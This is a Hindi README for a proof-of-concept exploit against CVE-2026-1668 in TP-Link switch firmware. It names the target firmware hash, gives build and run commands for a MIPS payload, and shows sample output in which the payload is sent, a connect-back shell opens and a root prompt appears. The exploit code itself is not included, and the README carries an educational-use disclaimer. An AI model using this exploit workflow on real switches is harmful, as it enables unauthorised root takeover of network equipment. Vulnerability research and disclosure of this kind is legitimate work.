
TP-Link स्विच फर्मवेयर में CVE-2026-1668 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो कमजोर उपकरणों पर रूट शेल प्रदान करने वाला MIPS पेलोड डिलीवर करता है।
यह CVE-2026-1668 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है। यह पूरी तरह से केवल शैक्षिक उद्देश्यों के लिए है। कृपया उन सिस्टमों का शोषण करने का प्रयास न करें जो आपके स्वामित्व में नहीं हैं या जिनका शोषण करने के लिए आपके पास स्पष्ट अनुमति नहीं है।
यह प्रूफ-ऑफ-कॉन्सेप्ट निम्नलिखित SHA256 हैश वाली फर्मवेयर इमेज के विरुद्ध विकसित किया गया था: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544।
उस हैश से मेल खाने वाले ज्ञात फर्मवेयर के नाम (अपूर्ण सूची):
पुराने फर्मवेयर संस्करण भी संभवतः असुरक्षित हैं, लेकिन उनके लिए एक्सप्लॉइट पेलोड में मामूली बदलाव की आवश्यकता हो सकती है।
पेलोड कैसे काम करता है, इसकी व्याख्या इस ब्लॉग पोस्ट में पाई जा सकती है।
पेलोड को बिल्ड करने के लिए एक MIPS Linux GCC टूलचेन की आवश्यकता होती है। Ubuntu 24.04 पर, इसे sudo apt install gcc-mips-linux-gnu के साथ इंस्टॉल किया जा सकता है।
$ make
यह एक्सप्लॉइट HTTP सर्वर द्वारा अपना पहला अनुरोध सर्व करने से पहले चलाया जाना चाहिए (अर्थात ताज़ा बूट पर)।
$ ./run.sh
स्क्रिप्ट आपको एक रूट शेल में ले जानी चाहिए। यदि नहीं, तो एक्सप्लॉइट विफल हो गया है।
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #